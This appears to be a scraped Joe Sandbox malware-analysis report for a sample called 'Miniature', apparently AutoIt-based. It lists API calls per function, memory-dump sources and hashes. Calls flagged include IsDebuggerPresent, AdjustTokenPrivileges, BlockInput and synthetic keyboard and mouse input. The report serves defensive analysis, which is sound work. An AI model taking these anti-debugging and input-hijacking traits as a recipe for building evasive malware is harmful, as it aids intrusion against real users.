                                                                                                                                                                                                                                                                                            • Instruction ID: 2f8e5c190d107dae3a275dafa359aed165d7a9fee8b1f9e79e35c1948b6e5cac
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca62c86aced49dedde83a368af7d78d160dc1f065313968a776a80a1839ff5d3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F219071500705EFEB20AF66D884BAB77F8AB41318F10441EE65792191EB70EE05DB94
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,00C546AC), ref: 00C7E482
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00C7E491
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C7E4A2
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C7E4AE
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2695905019-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: LocalTime
                                                                                                                                                                                                                                                                                            • String ID: %.3d$X64
                                                                                                                                                                                                                                                                                            • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00C42A8A
                                                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00C42A94
                                                                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00C42AA1
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C3014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00C309D8
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C3014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00C309F5
                                                                                                                                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C7205A
                                                                                                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C72087
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C72097
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 577356006-0
APIs
• GetCurrentProcess.KERNEL32(?,?,00C3502E,?,00CD98D8,0000000C,00C35185,?,00000002,00000000), ref: 00C35079
• TerminateProcess.KERNEL32(00000000,?,00C3502E,?,00CD98D8,0000000C,00C35185,?,00000002,00000000), ref: 00C35080
• ExitProcess.KERNEL32 ref: 00C35092
Memory Dump Source
• Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: b8364b5efd292c4cfd5f881465ce573812839a46ce9fd56d8a08d17e8d287f40
• Instruction ID: e3fb3e4d9190c84fbe4831da14122494fd1c00f35c00a2cbe8626da06e510097
• Opcode Fuzzy Hash: b8364b5efd292c4cfd5f881465ce573812839a46ce9fd56d8a08d17e8d287f40
• Instruction Fuzzy Hash: 51E04631011548AFCF216F50DD08F5C3B79EB51385F014014F81A8B531DB36DE42DAC0
APIs
• mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00C7ED04
Strings
Memory Dump Source
• Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
Similarity
• API ID: mouse_event
• String ID: DOWN
• API String ID: 2434400541-711622031
• Opcode ID: 01c8e18fff8a68551ef82480c0d77ac755c1193e481bbf60de0ab1a1148a9682
• Instruction ID: 08159b2f291d9b11f7f05402e0c9901a8bf29feb7bc2031437dd19e030d859ad
• Opcode Fuzzy Hash: 01c8e18fff8a68551ef82480c0d77ac755c1193e481bbf60de0ab1a1148a9682
• Instruction Fuzzy Hash: 26E0CD671AD7353CB90821187C07EF7034C8F26734B1141D7FC14D51C0ED505D4255A5
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 00C6E664
Strings
Memory Dump Source
• Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
Similarity
• API ID: NameUser
• String ID: X64
• API String ID: 2645101109-893830106
• Opcode ID: 2c23bd7dccfbf7645524d37195cba2ff2dd1f77a53cefba421d02c5b5260cb63
• Instruction ID: 89ab17dec5a5e25b9b36aa9aba63b11c2233ed0fbbf6761784216d6a0b071bbd
• Opcode Fuzzy Hash: 2c23bd7dccfbf7645524d37195cba2ff2dd1f77a53cefba421d02c5b5260cb63
• Instruction Fuzzy Hash: 1DD0C9B880112DEACB90CB90ECC8EDE777CBB05304F100652F106A2000D73095488B20
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00C952EE,?,?,00000035,?), ref: 00C84229
• FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00C952EE,?,?,00000035,?), ref: 00C84239
Memory Dump Source
• Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
• Opcode ID: d70e9ed6d9678ad4ccf32bd4d14afd709015313819ff6f96e8afbff9fd711d33
• Instruction ID: 18b57d314838d7580e64f27875cd34c198292ff3c7b75a3e2ac513f60db1d189
• Opcode Fuzzy Hash: d70e9ed6d9678ad4ccf32bd4d14afd709015313819ff6f96e8afbff9fd711d33
• Instruction Fuzzy Hash: 4BF0E5346042256AEB2026669C4DFEF366EEFC6765F000275F506D3191D9709E40D7B1
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00C7BC24
                                                                                                                                                                                                                                                                                            • keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 00C7BC37
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: InputSendkeybd_event
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3536248340-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C71B48), ref: 00C71A20
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,00C71B48), ref: 00C71A35
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 81990902-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • BlockInput.USER32(00000001), ref: 00C8F51A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: BlockInput
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00C3075E), ref: 00C30D4A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00C9358D
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00C935A0
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32 ref: 00C935AF
                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00C935CA
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00C935D1
                                                                                                                                                                                                                                                                                            • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00C93700
                                                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00C9370E
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C93755
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00C93761
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C9379D
                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C937BF
                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C937D2
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C937DD
                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00C937E6
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C937F5
                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00C937FE
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C93805
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00C93810
                                                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C93822
                                                                                                                                                                                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00CB0C04,00000000), ref: 00C93838
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00C93848
                                                                                                                                                                                                                                                                                            • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00C9386E
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00C9388D
                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C938AF
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C93A9C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                                            • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                                                            • Opcode ID: c161193db0df89d819cea9d0d8515de91d8f5fc282bbae4ed5e80ff6561edc7f
                                                                                                                                                                                                                                                                                            • Instruction ID: bb8e86eed0328061499689deab874bef7e39648da0989cae9575eef61b7fda75
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c161193db0df89d819cea9d0d8515de91d8f5fc282bbae4ed5e80ff6561edc7f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B026A71900209AFDB14DF64CD89FAE7BB9FB49314F008558F916AB2A0DB74AE41DF60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00CA7B67
                                                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00CA7B98
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00CA7BA4
                                                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,000000FF), ref: 00CA7BBE
                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00CA7BCD
                                                                                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00CA7BF8
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000010), ref: 00CA7C00
                                                                                                                                                                                                                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00CA7C07
                                                                                                                                                                                                                                                                                            • FrameRect.USER32(?,?,00000000), ref: 00CA7C16
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00CA7C1D
                                                                                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 00CA7C68
                                                                                                                                                                                                                                                                                            • FillRect.USER32(?,?,?), ref: 00CA7C9A
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00CA7CBC
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA7E22: GetSysColor.USER32(00000012), ref: 00CA7E5B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA7E22: SetTextColor.GDI32(?,00CA7B2D), ref: 00CA7E5F
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA7E22: GetSysColorBrush.USER32(0000000F), ref: 00CA7E75
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA7E22: GetSysColor.USER32(0000000F), ref: 00CA7E80
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA7E22: GetSysColor.USER32(00000011), ref: 00CA7E9D
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA7E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CA7EAB
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA7E22: SelectObject.GDI32(?,00000000), ref: 00CA7EBC
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA7E22: SetBkColor.GDI32(?,?), ref: 00CA7EC5
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA7E22: SelectObject.GDI32(?,?), ref: 00CA7ED2
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA7E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00CA7EF1
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA7E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CA7F08
                                                                                                                                                                                                                                                                                              • Part of subcall function 00CA7E22: GetWindowLongW.USER32(?,000000F0), ref: 00CA7F15
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4124339563-0
                                                                                                                                                                                                                                                                                            • Opcode ID: d298d6a3c82752e1fb0f5831490939a758317fbbfbd3c62ffc44a373ffe13d07
                                                                                                                                                                                                                                                                                            • Instruction ID: ff3ee9028f9a2dc68a6f37ad45420ce4bd19d51b0c0e4daf8afaafa1b7d4caae
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d298d6a3c82752e1fb0f5831490939a758317fbbfbd3c62ffc44a373ffe13d07
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54A16CB2408302AFDB119F64DC48B6FBBA9FB4A338F100B19FA63975A0D775D9448B51
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?), ref: 00C116B4
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00C52B07
                                                                                                                                                                                                                                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C52B40
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C52F85
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C11802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C11488,?,00000000,?,?,?,?,00C1145A,00000000,?), ref: 00C11865
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001053), ref: 00C52FC1
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C52FD8
                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00C52FEE
                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00C52FF9
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                            • API String ID: 2760611726-4108050209
                                                                                                                                                                                                                                                                                            • Opcode ID: ed3daa6ec64db33a6611cfa24624bb07f46b0bd184d6bc692f5bc4c54e8505cc
                                                                                                                                                                                                                                                                                            • Instruction ID: f05c4f57cc8fa2cb1cf904ad0373c7294a1a74b297fcb9b44324554a0297ba29
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed3daa6ec64db33a6611cfa24624bb07f46b0bd184d6bc692f5bc4c54e8505cc
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE12F2342002419FD725CF14C884BADB7F5FB46306F184129F9668B662C735EECAEB95
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000), ref: 00C9319B
                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C932C7
                                                                                                                                                                                                                                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00C93306
                                                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00C93316
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00C9335D
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00C93369
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00C933B2
                                                                                                                                                                                                                                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C933C1
                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00C933D1
                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00C933D5
                                                                                                                                                                                                                                                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00C933E5
                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C933EE
                                                                                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00C933F7
                                                                                                                                                                                                                                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C93423
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00C9343A
